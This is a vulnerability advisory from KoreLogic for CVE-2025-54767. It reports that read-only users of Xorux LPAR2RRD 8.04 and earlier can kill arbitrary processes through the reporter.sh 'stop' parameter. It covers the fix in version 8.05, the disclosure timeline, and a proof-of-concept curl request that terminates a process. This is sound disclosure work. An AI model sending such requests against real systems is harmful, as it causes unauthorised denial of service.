KL-001-2025-014: Xorux LPAR2RRD Read Only User Denial of Service Title: Xorux LPAR2RRD Read Only User Denial of Service Advisory ID: KL-001-2025-014 Publication Date: 2025-07-28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-014.txt 1. Vulnerability Details      Affected Vendor: Xorux      Affected Product: LPAR2RRD      Affected Version: 8.04 and prior      Platform: Rocky Linux 8.10      CWE Classification: CWE-648: Incorrect Use of Privileged APIs      CVE ID: CVE-2025-54767 2. Vulnerability Description      An authenticated, read-only user can kill any processes running      on the Xormon Original virtual appliance as the lpar2rrd user. 3. Technical Description      The web application endpoint of      https:///lpar2rrd-cgi/reporter.sh calls      ../bin/reporter_cfg.pl, which contains a URL parameter command      called "stop" which allows an attacker to specify a process ID      (PID) to stop. The web application, running as the lpar2rrd      user, then kills the process on the virtual appliance. This      could be used to stop the webserver, the xormon.war web      application or the lpar2rrd-daemon process, creating a denial      of service (DoS) condition. 4. Mitigation and Remediation Recommendation      Xorux released version 8.05, which includes a remediation      for this vulnerability. See https://lpar2rrd.com/note800.php. 5. Credit      This vulnerability was discovered by Jim Becher of KoreLogic,      Inc. 6. Disclosure Timeline      2025-07-17 : KoreLogic requests point-of-contact to securely                   report several vulnerabilities to Xorux.      2025-07-18 : Vendor provides support@xorux.com as the                   point-of-contact, noting that they do not use PGP.      2025-07-21 : KoreLogic submits this vulnerability and four                   additional discoveries to Xorux.      2025-07-23 : Vendor acknowledges receipt, stating that the issue                   has been remediated and a new version of the                   affected product will be available 2025-07-25.      2025-07-25 : Xorux publishes updated version of the affected                   product.      2025-07-28 : KoreLogic public disclosure. 7. Proof of Concept      On the Xormon Original virtual appliance:          [lpar2rrd@xorux ~]$ ps -efww | grep lpar2rrd | grep bash          lpar2rrd  185824  185823  0 May27 pts/0    00:00:00 -bash          lpar2rrd 1777882  185824  0 13:40 pts/0    00:00:00 grep --color=auto bash          [lpar2rrd@xorux ~]$      From attacker box:          attacker $ curl -k -H "Authorization: Basic amJlY2hlcjpqYmVjaGVy" 'https://172.31.255.207/lpar2rrd-cgi/reporter.sh?cmd=stop&pid=185824'          {"status":"terminated"}      On the Xormon Original virtual appliance:          [lpar2rrd@xorux ~]$ Connection to 172.31.255.207 closed.          attacker $ The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy